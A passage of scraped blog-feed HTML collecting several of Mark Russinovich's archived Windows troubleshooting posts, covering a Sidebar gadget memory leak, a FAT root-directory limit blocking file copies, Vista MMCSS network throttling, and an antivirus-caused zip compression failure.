Gadgets running and I didn’t know which one to blame. Unfortunately, the Sidebar offers no way to track memory usage by Gadget (or any other resource usage for that matter), so I had to apply manual steps to isolate the leak. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> After restarting the Sidebar, I removed the third-party Gadgets and added them back one at a time, leaving each to run for a minute or two while I monitored Sidebar’s Private Bytes usage. I added the Private Bytes Delta column to Process Explorer’s display to make it easy to spot increases, and after adding one of the Gadgets I started to see periodic positive Private Bytes Delta values, implicating it as the leaker: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="207" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178606/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178606/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120998i583249DDA2F1A43C" style="WIDTH: 550px; HEIGHT: 207px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Now that I knew the guilty Gadget, I could have simply uninstalled it and considered the case closed. But I was curious to know how the Gadget had managed to cause a leak in the Sidebar – a leak that persisted even after I removed the Gadget. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I navigated to the Gadget’s install directory and opened its HTML file to see what it was doing. The Gadget consists of around 3-dozen lines of pretty simple Javascript and I didn’t spot anything amiss. To narrow in on the problematic code, I began commenting out pieces and re-adding the Gadget to the Sidebar until the leak disappeared. The code I was left with was a function the Gadget configured to execute every 10 seconds to update its graphics. It called the Sidebar background object’s <A class="" href="#" mce_href="#" target="_blank"> RemoveObjects </A> </FONT> <FONT face="Calibri" size="3"> method and then added back graphics and text by calling the background’s <A class="" href="#" mce_href="#" target="_blank"> AddImageObject </A> </FONT> <FONT face="Calibri" size="3"> method. Here’s a simplified version of the relevant code: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="128" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178608/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2178608/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120999iF7A89781628F8193" style="WIDTH: 358px; HEIGHT: 128px" width="358" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The fact that it was using these APIs correctly meant that the leak was in the Sidebar’s code, but a quick Internet search didn’t turn up any mentions of a leak in the background object. If Sidebar APIs had a memory leak, why wasn’t it well known? I scanned the source code to the other Gadget’s on my system and discovered that none of them used the APIs, which explained why the leak isn't commonly encountered. However, comments in the Windows Gadget Gallery for the Gadget that inadvertently caused the leak revealed that other users had noticed it. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Having tracked the original unresponsive Gadget problem down to a leaky Sidebar API, I filed a bug in the Windows bug database and closed the case. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:36:22 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-frozen-clock-gadget/ba-p/723605 MarkRussinovich 2019-06-27T06:36:22Z The Case of the Failed File Copy https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-copy/ba-p/723596 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 01, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The other day a friend of mine called me to tell me that he was having a problem copying pictures to a USB flash drive. He’d been able to copy over two hundred files when he got this error dialog, after which he couldn’t copy any more without getting the same message: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="405" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087391/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087391/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120988i5C395F93F7F56CFC" style="WIDTH: 550px; HEIGHT: 405px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Unfortunately, the message, “The directory or file cannot be created”, provides no clue as to the underlying cause and the dialog explains that the error is unexpected and does not suggest where you can find the “additional help” to which it refers. <SPAN style="mso-spacerun: yes"> </SPAN> My friend was sophisticated enough to make sure the drive had plenty of free space and he ran Chkdsk to check for corruption, but the scan didn’t find any problem and the error persisted on subsequent attempts to copy more files to the drive. At a loss, he turned to me. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I immediately asked him to capture a trace with </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Process Monitor </FONT> </A> <FONT face="Calibri" size="3"> , a real-time file system and registry monitoring tool, which would offer a look underneath the dialogs to reveal actual operating system errors returned by the file system. <SPAN style="mso-spacerun: yes"> </SPAN> He sent me the resulting Process Monitor PML file, which I opened on my own system. After setting a filter for the volume in question to narrow the output to just the operations related to the file copy, I went to the end of the trace to look back for errors. I didn’t have to look far, because the last line appeared to be the operation with the error causing the dialog: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="295" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087396/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087396/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120989iA41E85A542B194CA" style="WIDTH: 550px; HEIGHT: 295px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To save screen space, Process Monitor strips the “STATUS” prefix from the errors it displays, so the actual operating system error is STATUS_CANNOT_MAKE. <SPAN style="mso-spacerun: yes"> </SPAN> I’d never seen or even heard of this error message. In fact, the version of Process Monitor at the time showed a raw error code, 0xc00002ea, instead of the error’s display name, and so I had to look in the Windows Device Driver Kit’s Ntstatus.h header file to find the display name and add it to the Process Monitor function that converts error codes to text. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> At that point I could have cheated and searched the Windows source code for the error, but I decided to see how someone without source access would troubleshoot the problem. A Web search took me to this old </FONT> <A href="#" target="_blank"> <FONT color="#0000ff" face="Calibri" size="3"> thread </FONT> </A> <FONT face="Calibri" size="3"> in a newsgroup for Windows file system developers: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="243" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087406/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087406/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120990i901BF2657A35D98E" style="WIDTH: 550px; HEIGHT: 243px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Sure enough, the volume was formatted with the FAT file system and the number of files on the drive, including those with long file names, could certainly have accounted for the use of all available 512 root-directory entries. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I had solved the mystery. I told my friend he had two options: he could create a subdirectory off the volume’s root and copy the remaining files into there, or he could reformat the volume with the FAT32 file system, which removes the limitation on entries in the root directory. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> One question remained, however. Why was the volume formatted as FAT instead of FAT32? The answer lies with both the USB drive makers and Windows format dialog. I’m not sure what convention the makers follow, but my guess is that many format their drives with FAT simply because it’s the file system guaranteed to work on virtually any operating system, including those that don’t support FAT32, like DOS 6 and Windows 95. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As for Windows, I would have expected it to always default to FAT32, but a quick look at the Format dialog’s pick for one of my USB drives showed I was wrong: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="462" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087416/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2087416/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120991i8088D6FCE1E7678D" style="WIDTH: 267px; HEIGHT: 462px" width="267" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I couldn’t find the guidelines used by the dialog anywhere on the Web, so I looked at the source and found that Windows defaults to FAT for non-CD-ROM removable volumes that are smaller than 4GB in size. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I’d consider this case closed, but I have two loose ends to follow up on: see if I can get the error message fixed so that it’s more descriptive, and lobby to get the default format changed to FAT32. </FONT> </P><P> <FONT face="Calibri" size="3"> Wish me luck. </FONT> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:35:25 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-copy/ba-p/723596 MarkRussinovich 2019-06-27T06:35:25Z Vista Multimedia Playback and Network Throughput https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/vista-multimedia-playback-and-network-throughput/ba-p/723591 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 26, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A few weeks ago a poster with the handle dloneranger </FONT> <A href="#" target="_blank"> <FONT color="#800080" face="Calibri" size="3"> reported </FONT> </A> <FONT face="Calibri" size="3"> in the 2CPU forums that he experienced reduced network throughput on his Vista system when he played audio or video. Other posters chimed in with similar results, and in the last week attention has been drawn to the behavior by other sites, including </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Slashdot </FONT> </A> <FONT face="Calibri" size="3"> and Zdnet blogger </FONT> <A href="#" target="_blank"> <FONT color="#800080" face="Calibri" size="3"> Adrian Kingsley-Hughes </FONT> </A> <FONT face="Calibri" size="3"> . </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Many people have correctly surmised that the degradation in network performance during multimedia playback is directly connected with mechanisms employed by the Multimedia Class Scheduler Service (MMCSS), a feature new to Windows Vista that I covered in my three-part TechNet Magazine </FONT> <A href="#" target="_blank"> <FONT color="#800080" face="Calibri" size="3"> article series </FONT> </A> <FONT face="Calibri" size="3"> on Windows Vista kernel changes. Multimedia playback requires a constant rate of media streaming, and playback will glitch or sputter if its requirements aren’t met. The MMCSS service runs in the generic service hosting process Svchost.exe, where it automatically prioritizes the playback of video and audio in order to prevent other tasks from interfering with the CPU usage of the playback software: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="379" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833250/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833250/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120983iA593C35CE70C9F0B" style="WIDTH: 308px; HEIGHT: 379px" width="308" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When a multimedia application begins playback, the multimedia APIs it uses call the MMCSS service to boost the priority of the playback thread into the realtime range, which covers priorities 16-31, for up to 8ms of every 10ms interval of the time, depending on how much CPU the playback thread requires. Because other threads run at priorities in the dynamic priority range below 15, even very CPU intensive applications won’t interfere with the playback. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> You can see the boost by playing an audio or video clip in Windows Media Player (WMP), running the Reliability and Performance Monitor (Start-&gt;Run-&gt;Perfmon), selecting the Performance Monitor item, and adding the Priority Current value for all the Wmplayer threads in the Thread object. Set the graph scale to 31 (the highest priority value on Windows) and you’ll easily spot the boosted thread, shown here running at priority 21: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="476" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833251/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833251/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120984i46EB8F41367E1095" style="WIDTH: 550px; HEIGHT: 476px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Besides activity by other threads, media playback can also be affected by network activity. When a network packet arrives at system, it triggers a CPU interrupt, which causes the device driver for the device at which the packet arrived to execute an Interrupt Service Routine (ISR). Other device interrupts are blocked while ISRs run, so ISRs typically do some device book-keeping and then perform the more lengthy transfer of data to or from their device in a Deferred Procedure Call (DPC) that runs with device interrupts enabled. While DPCs execute with interrupts enabled, they take precedence over all thread execution, regardless of priority, on the processor on which they run, and can therefore impede media playback threads. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Network DPC receive processing is among the most expensive, because it includes handing packets to the TCP/IP driver, which can result in lengthy computation. The TCP/IP driver verifies each packet, determines the packet’s protocol, updates the connection state, finds the receiving application, and copies the received data into the application’s buffers. This Process Explorer screenshot shows how CPU usage for DPCs rose dramatically when I copied a large file from another system: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="208" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833252/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833252/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120985i3C5B0E6A8BABD8A5" style="WIDTH: 460px; HEIGHT: 208px" width="460" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Tests of MMCSS during Vista development showed that, even with thread-priority boosting, heavy network traffic can cause enough long-running DPCs to prevent playback threads from keeping up with their media streaming requirements, resulting in glitching. MMCSS’ glitch-resistant mechanisms were therefore extended to include throttling of network activity. It does so by issuing a command to the NDIS device driver, which is the driver that gives packets received by network adapter drivers to the TCP/IP driver, that causes NDIS to “indicate”, or pass along, at most 10 packets per millisecond (10,000 packets per second). </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Because the standard Ethernet frame size is about 1500 bytes, a limit of 10,000 packets per second equals a maximum throughput of roughly 15MB/s. 100Mb networks can handle at most 12MB/s, so if your system is on a 100Mb network, you typically won’t see any slowdown. However, if you have a 1Gb network infrastructure and both the sending system and your Vista receiving system have 1Gb network adapters, you’ll see throughput drop to roughly 15%. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Further, there’s an unfortunate bug in the NDIS throttling code that magnifies throttling if you have multiple NICs. If you have a system with both wireless and wired adapters, for instance, NDIS will process at most 8000 packets per second, and with three adapters it will process a maximum of 6000 packets per second. 6000 packets per second equals 9MB/s, a limit that’s visible even on 100Mb networks. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I caused throttling to be visible on my laptop, which has three adapters, by copying a large file to it from another system and then starting WMP and playing a song. The Task Manager screenshot below shows how the copy achieves a throughput of about 20%, but drops to around 6% on my 1Gb network after I start playing a song: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="618" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833257/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833257/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120986i93B5BF3AE5355F3B" style="WIDTH: 499px; HEIGHT: 618px" width="499" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> You can monitor the number of receive packets NDIS processes by adding the “packets received per second” counter in the Network object to the Performance Monitor view. Below, you can see the packet receive rate change as I ran the experiment. The number of packets NDIS processed didn’t realize the theoretical throttling maximum of 6,000, probably due to handshaking with the remote system. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="377" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833259/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1833259/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120987iF7B8E79AF6D4405E" style="WIDTH: 550px; HEIGHT: 377px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Despite even this level of throttling, Internet traffic, even on the best broadband connection, won’t be affected. That’s because the multiplicity of intermediate connections between your system and another one on the Internet fragments packets and slows down packet travel, and therefore reduces the rate at which systems transfer data. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The throttling rate Vista uses was derived from experiments that reliably achieved glitch-resistant playback on systems with one CPU on 100Mb networks with high packet receive rates. The hard-coded limit was short-sighted with respect to today’s systems that have faster CPUs, multiple cores and Gigabit networks, and in addition to fixing the bug that affects throttling on multi-adapter systems, the networking team is actively working with the MMCSS team on a fix&nbsp;that allows for not so dramatically penalizing network traffic, while still delivering a glitch-resistant experience. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Stay tuned to my blog for more information. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:34:54 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/vista-multimedia-playback-and-network-throughput/ba-p/723591 MarkRussinovich 2019-06-27T06:34:54Z The Case of the Failed File Compression https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-failed-file-compression/ba-p/723585 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 06, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The other day Bryce tried to use Explorer’s <B style="mso-bidi-font-weight: normal"> Send To Compressed (zipped) Folder </B> feature, seen below, to package up his latest </FONT> <A href="#" target="_blank"> <FONT face="Calibri" size="3"> Process Monitor </FONT> </A> <FONT face="Calibri" size="3"> source code updates to send me. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="152" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702268/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702268/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120974iED9A8493C927E841" style="WIDTH: 445px; HEIGHT: 152px" width="445" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Instead of presenting compression progress dialog followed by an opportunity to edit the name of resulting compressed file, Explorer aborted the compression with this error: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="172" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702271/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702271/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120975iAF4BEFFB01594EAF" style="WIDTH: 408px; HEIGHT: 172px" width="408" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Bryce was perplexed. The error didn’t seem to make any sense because he obviously had read permission to the files in the selection, which he’d just finished editing, and compressing files shouldn’t involve some kind of search that could result in a file not being found. <SPAN style="mso-spacerun: yes"> </SPAN> He retried the compression operation, but got the same error, this time after a different number of files had finished compressing. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I happened to walk into his office at this point and he showed me the behavior by trying a few more times, all with the same outcome. <SPAN style="mso-spacerun: yes"> </SPAN> Now both of us were perplexed. It was time to investigate, and the tool we called on for the job was, somewhat ironically, Process Monitor. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> We launched Process Monitor, reproduced the failure, stopped the capture, and scanned through the thousands of operations in the trace looking for errors. We saw a slew of NOT FOUND errors near the start of the log, which are the generally innocuous result of an application checking for the pre-existence of a file. In fact, there were literally hundreds of them near the beginning of the log, all of which were queries for the file into which the compressed files would be placed: </FONT> </P> <BR /> <P class="MsoNormal" mce_keep="true" style="MARGIN: 0in 0in 10pt"> <IMG height="210" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702272/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702272/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120976i61995A10F9E4B9F6" style="WIDTH: 550px; HEIGHT: 210px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> That was disturbing, but not directly related to our troubleshooting effort, so I filed it away to look at later. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Several hundred events into the trace later we came across a SHARING VIOLATION error that bore a closer look: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="111" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702275/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702275/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120977i13431E5D9AA40614" style="WIDTH: 550px; HEIGHT: 111px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When a process opens a file it can specify if and how it wants to share the file with other processes while it has the file opened. The three types of sharing are read, write and delete, and each is represented with a flag that a process passes to the CreateFile API. In the operation that failed, Explorer didn’t pass any of the flags, indicating that it didn’t want to share the file, as seen in the ShareMode field: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="118" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702276/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702276/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120978iA721B62F64A47733" style="WIDTH: 426px; HEIGHT: 118px" width="426" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> For an open to succeed, the sharing mode of the opener must be compatible with the sharing allowed by a process that already has the file opened, so the explanation for the error was that another process already had the file opened. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Looking back at the trace, the open operation immediately preceding the one with the error is an open of the same file by a process named Inort.exe. Inort’s close of the file isn’t visible in the screenshot because it comes long after Explorer’s failed attempt to open the file. That confirmed that Explorer’s unwillingness to share the file conflicted with Inort having the file open, despite the fact that Inort specified read, write and delete sharing in its open of the file. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Process Monitor had closed another case: Inort holding the file open when Explorer tried to open it was the cause of the sharing violation and almost certainly the reason for the misleading error message. Next we had to identify Inort so that we could come up with a fix or workaround. Process Monitor also answered that question with its image tooltip: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702279/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702279/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120979i37AFE8AA1E0C9041" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> eTrust, Computer Associates’ Antivirus scanner, was apparently opening the file to scan it for viruses, but interfering with the operation of Explorer. Antivirus should be invisible to the system, so the error revealed a bug in eTrust. The workaround was for Bryce to set a directory filter that excludes his source directories from real-time scanning. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I couldn’t reproduce the error when I went back to my office, so I suspected that I had a different version of Inoculan on my system than Bryce. Process Monitor’s process page on the event properties dialog for an Inort.exe event showed that Bryce had version 7.01.0192.0001 and I had the more recent 7.01.0501.000: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> </FONT> <SPAN style="mso-no-proof: yes"> <SPAN style="mso-no-proof: yes"> <IMG height="149" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702283/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702283/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120980i3863BB76D22FB6DD" style="WIDTH: 294px; HEIGHT: 149px" width="294" /> </SPAN> <IMG height="152" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702281/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/1702281/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120981iAA59A4C17D703871" style="WIDTH: 307px; HEIGHT: 152px" width="307" /> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Why we have different versions isn’t clear since we’re both using images deployed and managed by Microsoft IT, but it appears that Computer Associates has fixed the bug in newer releases. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Now I turned my attention back to the inefficiencies of Explorer’s compression feature. I captured a Process Monitor trace of the compression of a single file and counted the associated operations. Just for this 